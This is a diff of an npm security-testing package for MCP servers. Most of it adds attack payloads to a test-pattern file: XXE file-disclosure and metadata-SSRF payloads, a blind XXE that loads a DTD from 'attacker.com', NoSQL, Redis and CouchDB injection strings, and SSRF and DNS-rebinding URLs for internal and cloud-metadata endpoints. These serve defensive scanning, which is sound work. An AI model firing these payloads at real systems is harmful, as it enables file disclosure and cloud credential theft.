@bryan-thompson/inspector-assessment-client 1.15.1 → 1.16.1

package/lib/lib/securityPatterns.js

@@ -1,9 +1,9 @@
 /**
  * Backend API Security Patterns
- * Tests MCP server API security with 16 focused patterns
+ * Tests MCP server API security with 18 focused patterns
  *
  * Architecture: Attack-Type with Specific Payloads
- * - Critical Injection (4 patterns): Command, Calculator, SQL, Path Traversal
+ * - Critical Injection (6 patterns): Command, Calculator, SQL, Path Traversal, XXE, NoSQL
  * - Input Validation (3 patterns): Type Safety, Boundary Testing, Required Fields
  * - Protocol Compliance (2 patterns): MCP Error Format, Timeout Handling
  * - Tool-Specific Vulnerabilities (7 patterns): Indirect Injection, Unicode Bypass, Nested Injection, Package Squatting, Data Exfiltration, Configuration Drift, Tool Shadowing
@@ -202,10 +202,141 @@ export const SECURITY_ATTACK_PATTERNS = [
             },
         ],
     },
+    // 5. XXE INJECTION (XML External Entity)
+    {
+        attackName: "XXE Injection",
+        description: "Test if tool processes XML external entities, allowing file disclosure or SSRF",
+        payloads: [
+            // Classic XXE - file disclosure
+            {
+                payload: '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
+                evidence: /(root:x:0:0|xxe.*processed|external.*entity.*loaded|file.*contents)/i,
+                riskLevel: "HIGH",
+                description: "XXE file disclosure via SYSTEM entity",
+                payloadType: "injection",
+                parameterTypes: ["xml", "data", "body", "payload", "content"],
+            },
+            // XXE with Windows path
+            {
+                payload: '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]><foo>&xxe;</foo>',
+                evidence: /(\[fonts\]|\[extensions\]|xxe.*processed|windows.*file.*accessed)/i,
+                riskLevel: "HIGH",
+                description: "XXE Windows file disclosure",
+                payloadType: "injection",
+                parameterTypes: ["xml", "data", "body", "payload"],
+            },
+            // XXE SSRF via HTTP entity
+            {
+                payload: '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]><foo>&xxe;</foo>',
+                evidence: /(ami-id|instance-id|xxe.*fetched|metadata.*accessed|ssrf.*xml)/i,
+                riskLevel: "HIGH",
+                description: "XXE SSRF to AWS metadata",
+                payloadType: "injection",
+                parameterTypes: ["xml", "data", "body", "payload"],
+            },
+            // Parameter entity XXE (blind XXE)
+            {
+                payload: '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">%xxe;]><foo>test</foo>',
+                evidence: /(dtd.*loaded|parameter.*entity|external.*dtd|xxe.*processed)/i,
+                riskLevel: "HIGH",
+                description: "Blind XXE via parameter entity",
+                payloadType: "injection",
+                parameterTypes: ["xml", "data", "body", "payload"],
+            },
+            // XXE in SOAP request
+            {
+                payload: '<?xml version="1.0"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><soap:Body><foo>&xxe;</foo></soap:Body></soap:Envelope>',
+                evidence: /(root:x:0:0|soap.*xxe|xxe.*soap|external.*entity)/i,
+                riskLevel: "HIGH",
+                description: "XXE in SOAP envelope",
+                payloadType: "injection",
+                parameterTypes: ["xml", "soap", "body", "request"],
+            },
+        ],
+    },
+    // 6. NOSQL INJECTION
+    {
+        attackName: "NoSQL Injection",
+        description: "Test if tool is vulnerable to NoSQL injection attacks (MongoDB, Redis, etc.)",
+        payloads: [
+            // MongoDB operator injection
+            {
+                payload: '{"$gt": ""}',
+                evidence: /(all.*documents|query.*executed|mongodb.*error|operator.*injection|nosql.*executed)/i,
+                riskLevel: "HIGH",
+                description: "MongoDB $gt operator injection",
+                payloadType: "injection",
+                parameterTypes: ["query", "filter", "where", "search", "data"],
+            },
+            // MongoDB $ne always-true
+            {
+                payload: '{"$ne": null}',
+                evidence: /(returned.*all|bypass.*auth|nosql.*injection|query.*result|documents.*found)/i,
+                riskLevel: "HIGH",
+                description: "MongoDB $ne bypass injection",
+                payloadType: "injection",
+                parameterTypes: ["query", "filter", "where", "password", "username"],
+            },
+            // MongoDB $where JavaScript injection
+            {
+                payload: '{"$where": "this.password.match(/.*/)"}',
+                evidence: /(javascript.*executed|\$where.*processed|nosql.*js|all.*passwords|query.*executed)/i,
+                riskLevel: "HIGH",
+                description: "MongoDB $where JavaScript injection",
+                payloadType: "injection",
+                parameterTypes: ["query", "filter", "where", "data"],
+            },
+            // MongoDB $regex DOS
+            {
+                payload: '{"$regex": "^(a+)+$"}',
+                evidence: /(regex.*executed|redos|timeout|catastrophic.*backtracking|query.*slow)/i,
+                riskLevel: "MEDIUM",
+                description: "MongoDB ReDoS via $regex",
+                payloadType: "injection",
+                parameterTypes: ["query", "filter", "search", "pattern"],
+            },
+            // MongoDB union-style query
+            {
+                payload: "admin', $or: [ {}, { 'a': 'a",
+                evidence: /(admin.*returned|auth.*bypass|or.*injection|nosql.*executed)/i,
+                riskLevel: "HIGH",
+                description: "MongoDB $or injection bypass",
+                payloadType: "injection",
+                parameterTypes: ["username", "user", "name", "query"],
+            },
+            // Redis command injection
+            {
+                payload: "test\r\nCONFIG GET *\r\n",
+                evidence: /(redis.*config|requirepass|maxmemory|save.*seconds|redis.*command.*executed)/i,
+                riskLevel: "HIGH",
+                description: "Redis CRLF command injection",
+                payloadType: "injection",
+                parameterTypes: ["key", "value", "data", "input"],
+            },
+            // Redis Lua script injection
+            {
+                payload: "EVAL \"return redis.call('INFO')\" 0",
+                evidence: /(redis_version|used_memory|connected_clients|lua.*executed)/i,
+                riskLevel: "HIGH",
+                description: "Redis Lua script injection",
+                payloadType: "injection",
+                parameterTypes: ["script", "command", "query", "data"],
+            },
+            // CouchDB injection
+            {
+                payload: '{"selector": {"$or": [{"_id": {"$gt": null}}]}}',
+                evidence: /(all.*documents|couchdb.*query|selector.*executed|documents.*returned)/i,
+                riskLevel: "HIGH",
+                description: "CouchDB selector injection",
+                payloadType: "injection",
+                parameterTypes: ["query", "selector", "filter", "find"],
+            },
+        ],
+    },
     // ==========================================
     // INPUT VALIDATION TESTS (3)
     // ==========================================
-    // 5. TYPE SAFETY
+    // 7. TYPE SAFETY
     {
         attackName: "Type Safety",
         description: "Test if tool validates parameter types correctly",
@@ -233,7 +364,7 @@ export const SECURITY_ATTACK_PATTERNS = [
             },
         ],
     },
-    // 6. BOUNDARY TESTING
+    // 8. BOUNDARY TESTING
     {
         attackName: "Boundary Testing",
         description: "Test edge cases and boundary conditions",
@@ -261,7 +392,7 @@ export const SECURITY_ATTACK_PATTERNS = [
             },
         ],
     },
-    // 7. REQUIRED FIELDS
+    // 9. REQUIRED FIELDS
     {
         attackName: "Required Fields",
         description: "Test if tool validates required parameters",
@@ -278,7 +409,7 @@ export const SECURITY_ATTACK_PATTERNS = [
     // ==========================================
     // PROTOCOL COMPLIANCE TESTS (2)
     // ==========================================
-    // 8. MCP ERROR FORMAT
+    // 10. MCP ERROR FORMAT
     {
         attackName: "MCP Error Format",
         description: "Verify errors follow MCP protocol specification",
@@ -292,7 +423,7 @@ export const SECURITY_ATTACK_PATTERNS = [
             },
         ],
     },
-    // 9. TIMEOUT HANDLING
+    // 11. TIMEOUT HANDLING
     {
         attackName: "Timeout Handling",
         description: "Test if tool handles long operations gracefully",
@@ -309,10 +440,10 @@ export const SECURITY_ATTACK_PATTERNS = [
     // ==========================================
     // TOOL-SPECIFIC VULNERABILITY TESTS (7)
     // ==========================================
-    // 10. INDIRECT PROMPT INJECTION (HTTP URL Fetching)
+    // 12. INDIRECT PROMPT INJECTION (HTTP URL Fetching + SSRF)
     {
         attackName: "Indirect Prompt Injection",
-        description: "Test if tool fetches and executes external content",
+        description: "Test if tool fetches external content or allows SSRF attacks against internal services",
         payloads: [
             {
                 payload: "http://example.com",
@@ -330,9 +461,153 @@ export const SECURITY_ATTACK_PATTERNS = [
                 payloadType: "injection",
                 parameterTypes: ["url", "uri", "link"],
             },
+            // SSRF - Local/Internal Services
+            {
+                payload: "http://localhost",
+                evidence: /(SSRF.*fetched|SSRF.*attempted|fetched.*internal|127\.0\.0\.1|localhost.*request|connection.*refused|ECONNREFUSED)/i,
+                riskLevel: "HIGH",
+                description: "SSRF - localhost access attempt",
+                payloadType: "injection",
+                parameterTypes: ["url", "uri", "link", "endpoint", "address"],
+            },
+            {
+                payload: "http://127.0.0.1:6379",
+                evidence: /(SSRF.*fetched|SSRF.*attempted|redis|PONG|\+OK|127\.0\.0\.1.*request|fetched.*internal)/i,
+                riskLevel: "HIGH",
+                description: "SSRF - Redis service access",
+                payloadType: "injection",
+                parameterTypes: ["url", "uri", "link", "endpoint"],
+            },
+            {
+                payload: "http://127.0.0.1:3306",
+                evidence: /(SSRF.*fetched|SSRF.*attempted|mysql|mariadb|3306.*request|fetched.*internal)/i,
+                riskLevel: "HIGH",
+                description: "SSRF - MySQL service access",
+                payloadType: "injection",
+                parameterTypes: ["url", "uri", "link", "endpoint"],
+            },
+            // SSRF - Cloud Metadata Endpoints
+            {
+                payload: "http://169.254.169.254/latest/meta-data/",
+                evidence: /(SSRF.*fetched|SSRF.*attempted|ami-id|instance-id|iam|security-credentials|metadata.*169\.254|fetched.*internal)/i,
+                riskLevel: "HIGH",
+                description: "SSRF - AWS metadata endpoint",
+                payloadType: "injection",
+                parameterTypes: ["url", "uri", "link", "endpoint"],
+            },
+            {
+                // GCP metadata via IP (more reliable than metadata.google.internal which requires GCP DNS)
+                payload: "http://169.254.169.254/computeMetadata/v1/project/project-id",
+                evidence: /(SSRF.*attempted.*169\.254|SSRF.*fetched.*169\.254|HTTPConnectionPool.*169\.254|attempted.*SSRF.*metadata|google.*project|gcp.*metadata)/i,
+                riskLevel: "HIGH",
+                description: "SSRF - GCP metadata endpoint",
+                payloadType: "injection",
+                parameterTypes: ["url", "uri", "link", "endpoint"],
+            },
+            {
+                payload: "http://169.254.169.254/metadata/instance",
+                evidence: /(SSRF.*fetched|SSRF.*attempted|subscriptionId|resourceGroup|vmId|azure.*metadata|fetched.*internal)/i,
+                riskLevel: "HIGH",
+                description: "SSRF - Azure metadata endpoint",
+                payloadType: "injection",
+                parameterTypes: ["url", "uri", "link", "endpoint"],
+            },
+            // SSRF - Internal Network
+            {
+                payload: "http://192.168.1.1",
+                evidence: /(SSRF.*fetched|SSRF.*attempted|192\.168.*request|fetched.*internal|router|gateway)/i,
+                riskLevel: "HIGH",
+                description: "SSRF - Internal network access",
+                payloadType: "injection",
+                parameterTypes: ["url", "uri", "link", "endpoint"],
+            },
+            {
+                payload: "http://10.0.0.1",
+                evidence: /(SSRF.*fetched|SSRF.*attempted|10\.0\.0.*request|fetched.*internal|private.*network)/i,
+                riskLevel: "HIGH",
+                description: "SSRF - Private network (10.x) access",
+                payloadType: "injection",
+                parameterTypes: ["url", "uri", "link", "endpoint"],
+            },
+            // SSRF - File Protocol
+            {
+                payload: "file:///etc/passwd",
+                evidence: /(root:x:0:0|file.*protocol|local.*file|file.*accessed|SSRF.*file)/i,
+                riskLevel: "HIGH",
+                description: "SSRF - file:// protocol abuse",
+                payloadType: "injection",
+                parameterTypes: ["url", "uri", "link", "endpoint"],
+            },
+            // SSRF - DNS Rebinding Attacks
+            // DNS rebinding bypasses IP-based checks by initially resolving to a safe IP,
+            // then rebinding to internal IPs after security validation
+            {
+                payload: "http://rebind.network/dnsbin",
+                evidence: /(dns.*rebind|rebind.*detected|internal.*access.*after|SSRF.*rebind|resolved.*internal)/i,
+                riskLevel: "HIGH",
+                description: "DNS rebinding - generic rebind domain",
+                payloadType: "injection",
+                parameterTypes: ["url", "uri", "link", "endpoint"],
+            },
+            {
+                payload: "http://a]@127.0.0.1/",
+                evidence: /(localhost|127\.0\.0\.1|internal.*access|SSRF.*bypass|host.*header.*injection)/i,
+                riskLevel: "HIGH",
+                description: "DNS rebinding - URL parser confusion",
+                payloadType: "injection",
+                parameterTypes: ["url", "uri", "link", "endpoint"],
+            },
+            {
+                payload: "http://127.0.0.1.nip.io",
+                evidence: /(localhost|127\.0\.0\.1|internal.*access|nip\.io.*resolved|SSRF.*bypass)/i,
+                riskLevel: "HIGH",
+                description: "DNS rebinding - nip.io wildcard DNS",
+                payloadType: "injection",
+                parameterTypes: ["url", "uri", "link", "endpoint"],
+            },
+            {
+                payload: "http://169.254.169.254.nip.io/latest/meta-data/",
+                evidence: /(metadata|ami-id|instance-id|SSRF.*metadata|nip\.io.*resolved)/i,
+                riskLevel: "HIGH",
+                description: "DNS rebinding - AWS metadata via nip.io",
+                payloadType: "injection",
+                parameterTypes: ["url", "uri", "link", "endpoint"],
+            },
+            {
+                payload: "http://0x7f000001",
+                evidence: /(localhost|127\.0\.0\.1|internal.*access|SSRF.*hex|hex.*ip.*resolved)/i,
+                riskLevel: "HIGH",
+                description: "DNS rebinding - hexadecimal IP encoding",
+                payloadType: "injection",
+                parameterTypes: ["url", "uri", "link", "endpoint"],
+            },
+            {
+                payload: "http://2130706433",
+                evidence: /(localhost|127\.0\.0\.1|internal.*access|SSRF.*decimal|decimal.*ip.*resolved)/i,
+                riskLevel: "HIGH",
+                description: "DNS rebinding - decimal IP encoding",
+                payloadType: "injection",
+                parameterTypes: ["url", "uri", "link", "endpoint"],
+            },
+            {
+                payload: "http://[::ffff:127.0.0.1]",
+                evidence: /(localhost|127\.0\.0\.1|internal.*access|ipv6.*mapped|SSRF.*ipv6)/i,
+                riskLevel: "HIGH",
+                description: "DNS rebinding - IPv6 mapped IPv4",
+                payloadType: "injection",
+                parameterTypes: ["url", "uri", "link", "endpoint"],
+            },
+            {
+                payload: "http://spoofed.burpcollaborator.net",
+                evidence: /(burp.*collaborator|external.*interaction|dns.*lookup.*detected|SSRF.*detected)/i,
+                riskLevel: "HIGH",
+                description: "DNS rebinding - out-of-band interaction test",
+                payloadType: "injection",
+                parameterTypes: ["url", "uri", "link", "endpoint"],
+            },
         ],
     },
-    // 11. UNICODE BYPASS
+    // 13. UNICODE BYPASS
     {
         attackName: "Unicode Bypass",
         description: "Test if tool decodes and executes unicode-encoded commands",
@@ -355,7 +630,7 @@ export const SECURITY_ATTACK_PATTERNS = [
             },
         ],
     },
-    // 12. NESTED INJECTION
+    // 14. NESTED INJECTION
     {
         attackName: "Nested Injection",
         description: "Test if tool executes hidden instructions in nested JSON",
@@ -378,7 +653,7 @@ export const SECURITY_ATTACK_PATTERNS = [
             },
         ],
     },
-    // 13. PACKAGE SQUATTING
+    // 15. PACKAGE SQUATTING
     {
         attackName: "Package Squatting",
         description: "Test if tool downloads typosquatted packages",
@@ -401,7 +676,7 @@ export const SECURITY_ATTACK_PATTERNS = [
             },
         ],
     },
-    // 14. DATA EXFILTRATION
+    // 16. DATA EXFILTRATION
     {
         attackName: "Data Exfiltration",
         description: "Test if tool leaks sensitive data like API keys, credentials, or environment variables",
@@ -448,7 +723,7 @@ export const SECURITY_ATTACK_PATTERNS = [
             },
         ],
     },
-    // 15. CONFIGURATION DRIFT
+    // 17. CONFIGURATION DRIFT
     {
         attackName: "Configuration Drift",
         description: "Test if tool allows unauthorized modification of runtime configuration",
@@ -487,7 +762,7 @@ export const SECURITY_ATTACK_PATTERNS = [
             },
         ],
     },
-    // 16. TOOL SHADOWING
+    // 18. TOOL SHADOWING
     {
         attackName: "Tool Shadowing",
         description: "Test if tool allows shadowing, poisoning, or overriding other tools",

package/lib/services/assessment/AssessmentOrchestrator.d.ts

@@ -5,6 +5,53 @@
 import { MCPDirectoryAssessment, AssessmentConfiguration, ManifestJsonSchema, ProgressCallback } from "../../lib/assessmentTypes.js";
 import { Tool, CompatibilityCallToolResult } from "@modelcontextprotocol/sdk/types.js";
 import { ClaudeCodeBridge, ClaudeCodeBridgeConfig } from "./lib/claudeCodeBridge.js";
+/**
+ * MCP Resource interface for assessment context
+ */
+export interface MCPResource {
+    uri: string;
+    name?: string;
+    description?: string;
+    mimeType?: string;
+}
+/**
+ * MCP Resource Template interface for assessment context
+ */
+export interface MCPResourceTemplate {
+    uriTemplate: string;
+    name?: string;
+    description?: string;
+    mimeType?: string;
+}
+/**
+ * MCP Prompt interface for assessment context
+ */
+export interface MCPPrompt {
+    name: string;
+    description?: string;
+    arguments?: Array<{
+        name: string;
+        description?: string;
+        required?: boolean;
+    }>;
+}
+/**
+ * MCP Server Capabilities interface
+ */
+export interface MCPServerCapabilities {
+    tools?: {
+        listChanged?: boolean;
+    };
+    resources?: {
+        subscribe?: boolean;
+        listChanged?: boolean;
+    };
+    prompts?: {
+        listChanged?: boolean;
+    };
+    logging?: Record<string, unknown>;
+    experimental?: Record<string, unknown>;
+}
 export interface AssessmentContext {
     serverName: string;
     tools: Tool[];
@@ -24,6 +71,23 @@ export interface AssessmentContext {
     manifestJson?: ManifestJsonSchema;
     manifestRaw?: string;
     onProgress?: ProgressCallback;
+    resources?: MCPResource[];
+    resourceTemplates?: MCPResourceTemplate[];
+    prompts?: MCPPrompt[];
+    serverCapabilities?: MCPServerCapabilities;
+    readResource?: (uri: string) => Promise<string>;
+    getPrompt?: (name: string, args: Record<string, string>) => Promise<{
+        messages: Array<{
+            role: string;
+            content: string;
+        }>;
+    }>;
+    transportConfig?: {
+        type: "stdio" | "sse" | "streamable-http";
+        url?: string;
+        usesTLS?: boolean;
+        oauthEnabled?: boolean;
+    };
 }
 export declare class AssessmentOrchestrator {
     private config;
@@ -44,6 +108,9 @@ export declare class AssessmentOrchestrator {
     private portabilityAssessor?;
     private externalAPIScannerAssessor?;
     private temporalAssessor?;
+    private resourceAssessor?;
+    private promptAssessor?;
+    private crossCapabilityAssessor?;
     constructor(config?: Partial<AssessmentConfiguration>);
     /**
      * Initialize Claude Code Bridge for intelligent analysis

package/lib/services/assessment/AssessmentOrchestrator.d.ts.map

@@ -1 +1 @@
-{"version":3,"file":"AssessmentOrchestrator.d.ts","sourceRoot":"","sources":["../../../src/services/assessment/AssessmentOrchestrator.ts"],"names":[],"mappings":"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"}
+{"version":3,"file":"AssessmentOrchestrator.d.ts","sourceRoot":"","sources":["../../../src/services/assessment/AssessmentOrchestrator.ts"],"names":[],"mappings":"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